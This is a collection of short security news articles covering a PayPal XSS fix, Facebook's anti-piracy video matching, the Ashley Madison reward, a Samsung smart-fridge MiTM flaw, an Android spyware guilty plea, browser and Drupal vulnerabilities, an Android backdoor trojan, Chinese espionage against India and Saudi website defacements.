PayPal fixes serious vulnerability in its domain

Photo Courtesy: Security Down

A serious flaw in PayPal Holdings Inc, an American company which operates a worldwide online payments system, has been patched. The flaw could have allowed an attacker to trick users into handing over their personal and financial details.

The flaw, which was detected by Ebrahim Hegazy, was caused by a stored cross-site scripting (XSS) bug in the SecurePayments.PayPal.com domain, which is used for PayPal’s hosted solution that enables buyers to pay with a payment card or their PayPal account, eliminating the need to capture or store sensitive payment information

“I’ve found a Stored XSS vulnerability that affects the SecurePayment page directly which allowed me to alter the page HTML and rewrite the page content, An attacker can provide his own HTML forms to the user to fullfill and send the users data back to attacker’s server in clear text format, and then use this information to purchase anything in behave of users or even transfere the users fund to his own account,” the researcher posted in his blog.

According to the Egypt-based researcher, a malicious actor could have set up a rogue shopping site or hijacked a legitimate website, and alter the “Checkout” button with a URL designed to exploit the XSS vulnerability.

The flaw could allow the attacker to change the contents of the SecurePayments page and display a phishing page where the victim is instructed to enter personal and financial information. The collected data is then sent back to a server controlled by the attacker, the researcher explained.

The researcher, who had found a serious flaw in Yahoo domain last year, reported about the vulnerability to PayPal on June 19. The payment processor confirmed patching the flaw on August 25.


After that, the company concerned awarded Hegazy $750 for his findings, which is said to be the maximum bug bounty payout for XSS vulnerabilities. 

Facebook to bring “Video Matching Technology” to control Piracy


Here comes a good news for those video creator who are fed up with the video piracy especially on social networking sites as Facebook is planning to launch a “Video Matching Technology” which will inform the real video owners that those videos are uploaded by others. 

A news report published in ReCode, confirms that in order to control the video piracy on Facebook, the company has decided to come up with the technology.

“We’ve heard from some of our content partners that third parties too frequently misuse their content on Facebook,” Facebook posted in its blog. “It’s not fair to those who work hard to create amazing videos. We want creators to get credit for the videos that they own.”

It is said that the company and its partners have started testing the new technology, which requires content owners to upload the clips they want to protect into Facebook’s system.

“It is the first step to creating the equivalent of YouTube’s Content ID system, which the video giant built up over years as a response to its own copyright/piracy problems. After years of ignoring video, 
Facebook is now a major player, so this kind of effort was obvious and overdue,” the news report reads.

“Facebook’s response comes after video makers and distributors have grown increasingly vocal about pirated videos, which by one estimate accounted for more than 70 percent of Facebook’s most popular videos. In May, Jukin Media, a video licensing agency best known for “Fail” clips, described Facebook’s copyright problems as “massive.” In June, Fullscreen CEO George Strompolos, who runs one of the biggest YouTube video networks,tweeted that he was “getting very tired of seeing our videos ripped there with no way to monitor or monetize,” the news report reads.

Now Facebook says Jukin and Fullscreen are two of its initial launch partners for the new technology, along with Zefr, a service company that helps content owners track their clips on YouTube. Facebook says it is also working with major media companies on the effort, but won’t identify them.


$376,000 for Informer in Ashley Madison hacking case

Avid Life Media (ALM), parent company of Ashely Madison,  is offering a $500,000 (Canadian dollars) as a prize money for any information related to the “identification, arrest and prosecution” of those hackers,who all were responsible in recent hack of the website.

Avid Life Media confirmed that the data Impact Life stole is legit.

The legal investigation has been started. With the help of Toronto police department and “white hat “hackers, they are hoping to find the perpetrators.

During press conference, acting superintendent Bryce Evans said that hackers have "certain techniques to help us and assist us.” He also said that they would lean on its “good working relationship” with the US Security agency FBI and Homeland Security.

The Toronto police and AML motivated to find the hackers responsible for data breach, Evans  referred to  two suicides that appears to be reason related to the Ashley Madison breach, "spin-off crimes and further victimization" from people accessing the hacked data.

$500,000 canadian dollar accounts for $376,000 US dollars.

Samsung smart Fridge vulnerability can expose Gmail Credentials, says experts

(PC- google images)
A recent update by a team of security researchers have identified potential threat to gmail credentials via the Samsung Smart Fridge.

A ‘Man in The Middle’ (MiTM) vulnerability was discovered during an IoT(Internet of Things) hacking challenge in a recent DEF CON conference. Samsung’s RF28HMELBSR smart fridge was targeted for the confirmation of the potential credential breach to gmail accounts. The fridge implemented SSL, it faces trouble in validating SSL certificates thus giving rise to MiTM vulnerabilities.

The Internet connected device has the ability to automatically download the Google calendar to an on-screen interface and the MiTM vulnerability facilitates the hacker to jump into the same network and steal gmail credentials of its neighbours.

Ken Munro, a security researcher at Pen Test Partners stated that "The internet-connected fridge is designed to display Gmail Calendar information on its display," and thus "It appears to work the same way that any device running a Gmail calendar does. A logged-in user/owner of the calendar makes updates and those changes are then seen on any device that a user can view the calendar on" he added.

"While SSL is in place, the fridge fails to validate the certificate. Hence, hackers who manage to access the network that the fridge is on (perhaps through a de-authentication and fake Wi-Fi access point attack) can Man-In-The-Middle the fridge calendar client and steal Google login credentials from their neighbours, for example."

While the research team failed to breach the software update server and the fridge terminal at DEF CON hacking spree, the mobile app had shown glitches that have potential security problems.

(pc- google images)
The coding in the mobile app contains a certificate that enables the encryption of credentials between the fridge and the mobile app. The certificate is correctly passworded, but the credential to the certificate appeared to be stored in the mobile app in an obfuscated form. So, if the codes of the certificates are broken down, it will allow the hacker to send commands to the fridge.

Pedro Venda of Pen Test Partners remarked “We wanted to pull the terminal unit out of the fridge to get physical access to things like a USB port and serial or JTAG interfaces, but ran out of time. However, we still found some interesting bugs that definitely merit further investigation. The MiTM alone is enough to expose a user’s Gmail creds."

This fiasco has created a tensed atmosphere in the Samsung Headquarters. In an open statement, the company ensured that "At Samsung, we understand that our success depends on consumers’ trust in us, and the products and services that we provide. We are investigating into this matter as quickly as possible. Protecting our consumers’ privacy is our top priority, and we work hard every day to safeguard our valued Samsung users.”


20-year-old student pleads to making spy app for Android phone



A 20-year-old student of Carnegie Mellon University has pleaded guilty to developing and selling malicious software that allowed others to remotely control Google Android phones, including using the phones' cameras to spy on their owners.

Morgan Culbertson, a resident of Churchill, could face up to 10 years in prison and $250,000 in fines when he is sentenced Dec. 2.

However, it is unclear that how many phones were actually infected by malicious software after his court appearance before a federal judge in Pittsburgh.

It is said that if anyone’s phone gets infected from the app, it can remotely control by others and used to spy and secretly take pictures without the phone owner's knowledge. It also records calls, intercept text messages and otherwise steal information the owners downloaded on the devices.

According to a news report published in IndiaToday, he is one of 12 people charged by U.S. authorities, and the fourth to plead guilty so far, in the worldwide takedown of the Darkode.com cybercriminal marketplace.

Almost 70 other people have been targeted for allegedly using the cybercriminal marketplace where hackers bought and sold malicious software.

"I committed the crime, so I am responsible," Culbertson said after pleading guilty, according to the Pittsburgh Tribune-Review. "I understand what I did was wrong and I take full responsibility. I would like in the future to use may skills to help protect people."

Assistant U.S. Attorney Jimmy Kitchen said that Culbertson worked online with a man identified only as "Mike from the Netherlands" to create Dendroid, the malware that was secretly linked to Android phone apps available for purchase through Google Play.

Security flaw detected in popular Dolphin and Mercury browsers

Rotologix, a cyber-security enthusiast, has found out zero-day flaws, which could allow an attacker to perform remote code execution, in two popular Dolphin and Mercury Android mobile browsers, which have 100 million users.

The remote code execution exploit allows an attacker to replace the browser's theme package with an infected counterpart.

“The Mercury Browser for Android suffers from an insecure Intent URI scheme implementation and a path traversal vulnerability within a custom web server used to support its WiFi Transfer feature. Chaining these vulnerabilities together can allow a remote attacker to perform arbitrary reading and writing of files within the Mercury Browser's data directory,” the researcher posted in a blog post.

It is said that the exploit allows the attackers to modify the downloading and applying new themes functions to the browser. Those who are affected, need to download, and apply a new Dolphin browser theme all again.


And for Dolphin, Rotologix said, "An attacker with the ability to control the network traffic for users of the Dolphin browser for Android, can modify the functionality of downloading and applying new themes for the browser. Through the exploitation of this functionality, an attacker can achieve an arbitrary file write, which can then be turned into code execution within the context of the browser on the user's device.”

Researchers detect a new Android Trojan targeting users from china

Photo Courtesy: Dr. Web

Security researchers from Doctor Web, Russian anti-virus software developer, have detected another new Android Trojan, which is said to be distributed among users from china to spy on their victims.

Previously, the researchers had found an Android Trojan, which spreads as a security certificate that tricks users into thinking it must be installed onto users device. That Trojan had made two-Step authentication feature insecure when it got infected users' device  with a new malware which was capable of intercepting their messages and forwarding them to cybercriminals.

The Trojan dubbed Android.Backdoor.260.origin can intercept SMS messages, record phone calls, track GPS coordinates of the infected device, take screenshots, and even collect data entered by the user.

“Due to the fact that Android.Backdoor.260.origin is distributed as “AndroidUpdate”, potential victims are very likely to install it on their mobile devices,” the researchers posted in a blog.

According to the researchers, the Trojan has main malicious features that are implemented in special modules incorporated into the malware's software package. Once it gets activated, the Trojan extracts the following additional components: super, detect, liblocSDK4b.so, libnativeLoad.so, libPowerDetect.cy.so, 1.dat, libstay2.so, libsleep4.so, substrate_signed.apk and cInstall.

“Next, it tries to run the binary cInstall file (detected by Dr.Web as Android.BackDoor.41) with root privileges. If the attempt is successful, this malicious module plants a number of files extracted earlier into system folders and tries to stealthily install a utility called “Substrate”. This tool expands functionality of applications and is used by Android.Backdoor.260.origin to intercept entered data. If the Trojan does not succeed in acquiring root privileges, then, most likely, it will fail to install necessary components. As a result, the malware will not be able to perform the majority of its functions properly,” the researchers added.

Once all the modules get installed, the Trojan removes its entire shortcut created earlier and launches the malicious service called PowerDetectService which runs the malicious module with the name libnativeLoad.so. It also has been added to Dr.Web virus database under the name of Android.BackDoor.42, and Substrate.

“In fact, this tool is not actually malicious and can be easily downloaded from Google Play. However, cybercriminals have modified the original application and incorporated the new version into Android.Backdoor.260.origin. As a result, the tool became potentially dangerous for mobile devices' users,” the researchers explained.

The researchers have now warned the users not to install applications from unreliable sources. And it is important to protect their mobile device with reliable anti-virus software.

Chinese Hackers targeting Indian institution to steal information

If we had to believe FireEye Inc, a US-based cyber security firm, hackers based in China are now targeting India to steal information about its border disputes and diplomatic intelligence.

The relationship between these two countries once broke in 1962 when both of them fought with each other over border issues. However, the situations between these countries have become a bit cool when Modi government came in power.

It is also said that the hackers were also active a month before the PM Modi visit to China.   
Now, it seems the cyber threat would make the thing worse as it was before.   

As per the company, an advanced campaign over the past four years has targeted more than 100 people, 70 percent of whom are in India. Earlier this year it identified a decade-long cyber espionage operation against businesses and governments in Southeast Asia.

“These attacks on India and its neighbouring countries reflect growing interest in its foreign affairs,” Bryce Boland, FireEye’s chief technology officer for Asia Pacific, said in the statement.

Along with the Indian institutions, the hackers also targeted Tibetan activists and others in Southeast Asia, in particular government, diplomatic, scientific and educational organizations, the security company said.

According to a news report published in The Financial Times, the hackers sent so-called spear phishing e-mails with Microsoft Word attachments appearing to relate to regional issues. Those messages contained a script which would create a “backdoor” in infected machines, allowing access to programs without detection by security measures.


Security vulnerabilities fixed in latest Drupal versions

After addressing several vulnerabilities, Drupal  has asked its user to upgrade its existing Drupal 7 and 6 sites.

A XSS vulnerability found in the auto-complete functionality of forms as the requested URL is not sanitized properly, which affected both Drupal 6 and 7. The flaw could allow an attacker to upload files to vulnerable websites under another user’s account.

“For security reasons, the autocomplete system now makes Ajax requests to non-clean URLs only, although protection is also in place for custom code that does so using clean URLs,” Drupal explained.

The Drupal, which is used by more than 1.1 million websites, published a security advisory on August 19 confirming that it had patched several vulnerabilities in its versions 7.39 and 6.37.

It revealed that the version 7 was affected by a cross-site scripting (XSS) vulnerability that could allow an attacker to launch attacks by invoking Drupal.ajax() on a whitelisted HTML element.

Drupal developers warn that version 7 of the CMS is plagued by a SQL injection vulnerability that allows an attacker with elevated privileges to inject malicious code in SQL comments. The flaw, found in the SQL comment filtering system, can only be exploited on one contributed module.

“When form API token validation fails (for example, when a cross-site request forgery attempt is detected, or a user tries to submit a form after having logged out and back in again in the meantime), the form API now skips calling form element value callbacks, except for a select list of callbacks provided by Drupal core that are known to be safe. In rare cases, this could lead to data loss when a user submits a form and receives a token validation error, but the overall effect is expected to be minor,” Drupal said in the advisory.

The last vulnerability patched in Drupal 6 and 7 is an information disclosure issue related to menu links.

“Users without the ‘access content’ permission can see the titles of nodes that they do not have access to, if the nodes are added to a menu on the site that the users have access to,” reads Drupal’s advisory.

The vulnerabilities affect Drupal core 6.x versions prior to 6.37 and Drupal core 7.x versions prior to 7.39. CVE identifiers have yet to be assigned to these vulnerabilities.

"Cyber of Emotion" hacks saudi websites

(PC- google images)
Many Saudi websites were hacked by a group that gave warnings that they would be making the attacks.The group known as “Cyber of Emotion” hacked more than 24 government websites over a period of two hours.

As reported by Al-Riyadh newspaper, the visitors to the website were directed to a page that read- “We do not want to harm the site. Had it been hacked by enemies, your personal information, emails and registration data would have been compromised."

The hackers said that their team had already warned their administrators that the websites are not properly secured and they should do something about it, but, the warnings were ignored, they claim.

The newspaper reported that the websites hacked included that of government hospitals, municipalities, education departments, social development offices and health departments.

The websites, however, started working properly a few hours after the attack.

Last year, the twitter account of Ministry of Justice was hacked by the same group.